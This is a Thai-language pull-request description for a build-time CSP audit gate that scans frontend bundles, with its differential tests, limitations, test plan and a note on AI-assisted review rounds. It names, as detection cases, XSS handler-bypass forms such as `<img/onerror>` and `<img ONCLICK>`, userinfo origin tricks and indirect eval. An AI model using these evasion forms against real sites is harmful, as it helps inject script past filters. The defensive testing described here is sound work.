`scripts/tests/audit-bundle-csp.differential.test.mjs` จึง**ไม่ระบุคำตอบที่ถูกเอง** แต่ถามแหล่งความจริงเดียวกับที่ browser ใช้แล้ว assert ว่า gate เห็นตรงกัน — `parse5` (HTML tokenizer ตาม spec) ตอบว่า markup มี attribute อะไรจริง · `new URL()` ตอบว่า URL นั้นจะไปที่ origin ไหนจริง · **รูปแบบใหม่ที่ยังไม่มีใครนึกถึงจึงถูกครอบอัตโนมัติ**

**พิสูจน์แล้วว่าแดงได้จริง** — รันกับโค้ดของ `6fd2b58` ได้ไม่ตรงกัน 8 จุด: handler 4/19 (`<img/onerror>` · `<img src=y /onerror>` · `<a href="y"onclick>` · **`<img ONCLICK>`** ซึ่งไม่มีใครรายงานมาก่อน) และ origin 4/8 (userinfo ที่คั่นด้วย `, ; ( {`)

**เรื่อง dependency**: ยืม `parse5` จาก `frontend/node_modules` (มาจาก jsdom ที่ vitest ใช้อยู่แล้ว) และ **ข้ามตัวเองพร้อมเหตุผลที่บอกวิธีแก้** เมื่อยังไม่ได้ `npm ci` ฝั่ง frontend แทนที่จะ fail ทั้ง suite — มีเทสบังคับว่าข้อความ skip ต้องบอกทั้งสิ่งที่ขาดและวิธีแก้ (ไม่ให้ "ข้ามเงียบ") · ในทางปฏิบัติได้รันจริงเสมอบนเส้นทางที่สำคัญ เพราะ `pre-push` รัน vitest อยู่แล้วจึงต้องมี node_modules ครบ และ CI ก็ `npm ci` ก่อน

**ข้อจำกัดที่เจอระหว่างเขียน**: `parse5` ทำตาม tree-construction rules เต็มรูป จึงทิ้ง `<td>` ที่อยู่นอก `<table>` ทั้งแท็ก ขณะที่ gate สแกนแบบไม่สนบริบท (ถูกต้องตามหน้าที่ เพราะ HTML fragment ใน chunk JS ไม่มี wrapper แต่ handler ทำงานจริงเมื่อ fragment ถูก inject เข้าที่) — fixture จึงต้องวางแท็กในบริบทที่ HTML ยอมรับ เขียนกำกับไว้ในไฟล์แล้ว

## ข้อจำกัดที่ต้องรู้

- ตรวจ **build output ของเครื่องที่รัน** ไม่ใช่ source และ **ไม่ใช่ bundle ที่ production เสิร์ฟอยู่** — ต้องรันหลัง `npm run build` เสมอ (gate เสียบไว้หลังบล็อก frontend แล้ว) · นี่คือ pre-merge gate ตามหน้าที่ของมัน การตรวจ bundle ของ production เป็นคนละงานที่ต้องดึงไฟล์จาก production มาแล้วรันด้วย `--dist`
- ไฟล์ binary ถูกข้ามตาม extension **ที่เหลือทั้งหมดถูกอ่าน** (fail-closed) — ไฟล์ชนิดใหม่ที่ไม่รู้จักจะถูกตรวจ ไม่ใช่ถูกข้าม
- **`//host` จับเฉพาะที่มีบริบทบอกว่าเป็น URL** (argument ของ fetch/XHR, ใน `url()`, หรือค่าที่ถูกกำหนดให้ attribute/property) สตริงลอย ๆ ไม่ตรวจ — วัดกับ build จริงแล้วการไล่จับทุกที่ให้ false positive (`//i.test` จาก regex literal ที่ bundler ลากมา) เลือกความเงียบที่อธิบายได้ แทนการฟ้องผิดที่ทำให้คนเลิกเชื่อ gate · URL รูปเต็ม (`https://host/…`) ไม่มีข้อจำกัดนี้ ถูกตรวจทุกที่ที่เจอ
- URL ที่ประกอบจากตัวแปร (`fetch(base + path)`) และ indirect eval (`(0,eval)()`) regex มองไม่เห็น — gate นี้ลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี
- ไม่ยิงเครือข่าย ไม่ใช้ Docker — รันได้บนเครื่องเปล่าที่มีแค่ `frontend/dist`

## Test plan

- [x] `node --test scripts/tests/*.test.mjs` — **120/120** (73 ตัวเป็นของ gate นี้: 69 + differential 4 · ที่เหลือเป็นของ PR ก่อนหน้า)
- [x] `bash -n` ผ่านทั้ง bash ของ git และ **bash ของ WSL** (ที่เข้มงวดกว่า) สำหรับ `ci-local.sh` และ hook ทั้งสามตัว
- [x] `node scripts/audit-bundle-csp.mjs` — **PASS** บน build ในเครื่อง (อ่าน 72 ข้าม 2 จาก 74)
- [x] `node scripts/validate-schema-parity.mjs` — ไม่พบ drift
- [x] pre-push hook (vitest 560) — ผ่านตอน push
- [x] **mutation test** — ทุกเทสที่เขียนกัน regression ถูกย้อนบั๊กกลับเข้าไปแล้วต้องแดง ไม่มีตัวไหนเขียวลอย · เทสของรอบที่ 5–7 ยืนยันด้วยการรัน CLI กับ fixture จริงบนคอมมิตก่อนแก้
- [x] **PHPUnit Unit suite** — 266 เทส (ล้มสองตัวที่เป็นของ Windows เท่ากับก่อนแก้ ยืนยันด้วยการ stash แล้วรันซ้ำ)

> **หมายเหตุเรื่องกระบวนการ** — ห้ารอบแรกผู้เขียนตรวจงานตัวเอง แล้วเจอ false clean เพิ่มทุกรอบ · **รอบที่ 6** เปลี่ยนเป็น subagent (ตระกูลเดียวกับผู้เขียน) เจอ Critical 2 ข้อทันที และข้อเสนอ differential test จากรอบนั้นถูกนำมาทำแล้วใน `22c84b7` · **รอบที่ 7** เปลี่ยนเป็น codex (OpenAI — คนละ provider family) เจอ Critical อีก 2 ข้อทันที ซึ่งหนึ่งในนั้น (ข้อ 21) **ค้างมาตั้งแต่รอบที่ 2 และรอด reviewer มา 5 รอบ** · **รอบที่ 8** เปลี่ยนแกนการมองแทนการเปลี่ยนคนตรวจ — แยกเป็น Standards กับ Spec ที่ไม่เห็น context ของกัน แล้วเจออีก 6 ข้อ โดยข้อที่หนักที่สุด (ข้อ 24: gate ไม่เคยถูกบังคับให้รัน) เป็นสิ่งที่ **ไม่มีรอบไหนก่อนหน้ามองเห็นเลย เพราะทุกรอบมองแต่ความถูกต้องของโค้ด ไม่ได้ถามว่าโค้ดถูกเรียกจริงไหม**
>
> บทเรียนสองชั้น: ความเห็นที่สองมีค่าที่สุดเมื่อมาจากคนละ provider family — และเมื่อ provider ต่างค่ายเริ่มเห็นเหมือนกันแล้ว สิ่งที่ได้ผลรอบถัดไปคือเปลี่ยน**คำถาม** ไม่ใช่เปลี่ยนคนตอบ

Refs #113
